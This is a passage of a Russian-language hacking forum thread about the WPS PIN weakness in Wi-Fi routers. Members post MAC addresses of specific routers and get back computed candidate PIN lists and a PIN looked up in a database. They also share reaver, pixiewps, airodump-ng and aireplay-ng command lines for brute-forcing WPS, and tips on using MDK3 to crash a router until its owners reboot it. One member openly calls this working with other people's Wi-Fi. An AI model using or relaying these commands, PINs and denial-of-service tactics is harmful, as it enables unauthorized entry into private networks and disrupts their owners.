Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Скорее заменили. Keenetic 4G по этому же алгоритму работают, проверено лично.
    Уже обсуждалось, эти роутеры не принимают ни один пинкод. Только когда кто-то нажимает на кнопку WPS, можно получить пароль точки по пин коду 00000000.
     
  2. Vikhedgehog

    Vikhedgehog Elder - Старейшина

    Joined:
    24 Jul 2013
    Messages:
    367
    Likes Received:
    163
    Reputations:
    19
    У кинетиков третего поколения пин код всегда имеет значение 00000000 и выключен по умолчанию. Выдает ли точка на такой пин пароль - не проверял.
     
    binarymaster likes this.
  3. PSYDRUGS

    PSYDRUGS Member

    Joined:
    1 Sep 2011
    Messages:
    271
    Likes Received:
    46
    Reputations:
    0
    Посмотрите пожалуйста пин для UR-315BN, дефолтный 99956042 не подходит, MAC: D4:BF:7F:55:E6:BC.
     
  4. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,250
    Reputations:
    148
    56296280
     
  5. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Попробуйте также 05294176 (нашёл в базе 3WiFi)
     
  6. Kevin Shindel

    Kevin Shindel Elder - Старейшина

    Joined:
    24 May 2015
    Messages:
    1,011
    Likes Received:
    1,192
    Reputations:
    62
    Ребята помогите с TP-Link 741.
    Ривер брутит 10 ключей после AP блочится.
    Есть варианты кроме МДК3?
     
  7. Venusbonus

    Venusbonus New Member

    Joined:
    12 Oct 2015
    Messages:
    11
    Likes Received:
    1
    Reputations:
    0
    Ввожу
    reaver -i wlan0mon -b bssid -vvv -K 1
    после нескольких попыток срабатывает pixiewps и не находя пина останавливается. Можно как-нибудь автоматически повторять попытки?
    Сам ривер продолжает работу по перебору, почему бы и пикси периодически не пытаться найти пин.
     
  8. dt maxi

    dt maxi New Member

    Joined:
    26 May 2015
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Помогите найти wps pin к zyxel internet centr EC:43:F6:D5:51:80
     
  9. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,250
    Reputations:
    148
    39800329 ???
     
  10. dt maxi

    dt maxi New Member

    Joined:
    26 May 2015
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Пробовал не подходит
     
  11. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,673
    Likes Received:
    5,797
    Reputations:
    51
    Смотрите эти -- либо хозяин поменял Pin
    PIN codes for D4:BF:7F:55:E6:BC

    56296280 | 24-bit PIN
    72878682 | 28-bit PIN
    63360608 | 32-bit PIN
    08455000 | 36-bit PIN
    50895960 | 40-bit PIN
    16007000 | 44-bit PIN
    01781083 | 48-bit PIN
    29355082 | Reverse 48-bit PIN
    10816578 | D-Link PIN
    89631768 | D-Link PIN +1
    08091208 | Vodafone EasyBox
    11475873 | Inv NIC to PIN
    12592562 | NIC * 2
    68888848 | NIC * 3
    27950678 | OUI + NIC
    83130274 | OUI - NIC
    84771230 | OUI ^ NIC
    12345670 | Static PIN - Cisco
    46264848 | Static PIN - D-Link 1
    76229909 | Static PIN - D-Link 2
    62327145 | Static PIN - D-Link 3
    68175542 | Static PIN - DSL-2740R
    95661469 | Static PIN - TRENDnet
    20854836 | Static PIN - Upvel
    99956042 | Static PIN - Onlime
    35611530 | Static PIN - Edimax

    #2806Минуту назад
     
  12. Triton_Mgn

    Triton_Mgn Elder - Старейшина

    Joined:
    6 Jul 2015
    Messages:
    3,673
    Likes Received:
    5,797
    Reputations:
    51
    PIN codes for EC:43:F6:D5:51:80

    39800329 | 24-bit PIN
    46433282 | 28-bit PIN
    11751687 | 32-bit PIN
    60770561 | 36-bit PIN
    39840004 | 40-bit PIN
    35173120 | 44-bit PIN
    81391363 | 48-bit PIN
    03925560 | Reverse 48-bit PIN
    40038452 | D-Link PIN
    28941002 | D-Link PIN +1
    35018001 | Vodafone EasyBox
    27971833 | Inv NIC to PIN
    79600644 | NIC * 2
    19400969 | NIC * 3
    26867106 | OUI + NIC
    15038623 | OUI - NIC
    37402785 | OUI ^ NIC
    12345670 | Static PIN - Cisco
    46264848 | Static PIN - D-Link 1
    76229909 | Static PIN - D-Link 2
    62327145 | Static PIN - D-Link 3
    68175542 | Static PIN - DSL-2740R
    95661469 | Static PIN - TRENDnet
    20854836 | Static PIN - Upvel
    99956042 | Static PIN - Onlime
    35611530 | Static PIN - Edimax
     
  13. Algierd

    Algierd Member

    Joined:
    21 Sep 2013
    Messages:
    405
    Likes Received:
    16
    Reputations:
    0
    TP Link походу C0:4A:00:AB:62:F4. Подбросте рабочий пин, плиз.
     
  14. VladimirV

    VladimirV Well-Known Member

    Joined:
    1 Apr 2013
    Messages:
    1,130
    Likes Received:
    6,150
    Reputations:
    57
    TP-LINK TL-WR740N
    очень сильно глючит от MDK3, но необходимо чтоб сидели активные клиенты. Атака 15-30 мин, и они его перезагрузят.
     
  15. Tuana

    Tuana New Member

    Joined:
    1 Oct 2015
    Messages:
    20
    Likes Received:
    3
    Reputations:
    0
    Я новичок в общении с чужими WiFi-ями. Полтора месяца назад про Kali Linux или WiFiSlax даже не слышала. Тему пока дочитала только до 90 страницы, поэтому извините если вопрос глупый.
    Осваиваю AirSlax, reaver бывает еле шивелится или тупо говорит: транзакции не получилось и гоняет один и тотже ПИН. В большинстве случаев (но не всегда) перезагрузка сдвигает дело с мертвой точки. Скажите пожалуйста можно-ли командно обнулить все переменные reaver и удалить из памяти процессы задействованные с ним?
     
  16. fixerz

    fixerz Active Member

    Joined:
    12 Oct 2015
    Messages:
    94
    Likes Received:
    136
    Reputations:
    3
    скачай kali смонтируй на флешку и посмотри это видео.

    Проблема airslax в том, что там нельзя посмотреть сам процесс перебора и что происходит в момент отправки пина, он просто показвывает пины, которые он прогоняет. В процессе перебора wps роут переодически бросает ошибки и иногда этот зловещий бан на 60сек(который практически не обойти) и нужно немного регулировать ситуацию и подгонять команды под каждый роутер.

    Идеальная скорость перебора 3 sec/pin

    Всё получится:)
     
    Ana1rebus likes this.
  17. matrixukr

    matrixukr New Member

    Joined:
    30 Aug 2015
    Messages:
    18
    Likes Received:
    1
    Reputations:
    0
    Как риверу подсунуть список с несколькими пинами, чтоб он только их перебирал?
    Так чтоб один пин посылал раз в 10 мин.
     
    #2777 matrixukr, 13 Oct 2015
    Last edited: 13 Oct 2015
  18. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,250
    Reputations:
    148
    От зацикливания часто спасает такая последовательность:

    1 окно Терминала:

    airodump-ng -c x wlan0

    2 окно Терминала:

    aireplay-ng -1 5 -a XX:XX:XX:XX:XX:XX wlan0

    3 окно Терминала:

    reaver -i wlan0 -b XX:XX:XX:XX:XX:XX -c x -A -vvv --no-nacks --win7

    Попробуйте, на досуге...:)
     
    quite gray, Payer and Tuana like this.
  19. Tuana

    Tuana New Member

    Joined:
    1 Oct 2015
    Messages:
    20
    Likes Received:
    3
    Reputations:
    0
    Помогло.
    Огромное спасибо. Пробовала только один раз, надеюсь будет спасать и дальше.
    Что означает ключ -vvv? В хэлпе его нет, но команда проходит успешно.
     
  20. Tuana

    Tuana New Member

    Joined:
    1 Oct 2015
    Messages:
    20
    Likes Received:
    3
    Reputations:
    0
    Здесь уже писали: файл в котором перечисляются PINы (отдельно первая и отдельно вторая часть) - ХХХХХХХХХХХХ.wps, который располагается - /mnt/sdb1/dump/reaver. Количество строк в файле менять нельзя.
    Ключ "- t"позволяет:
    - t, --timeout(перерыв) = <секунды> Установить перерыв между атаками [5]
     
    matrixukr likes this.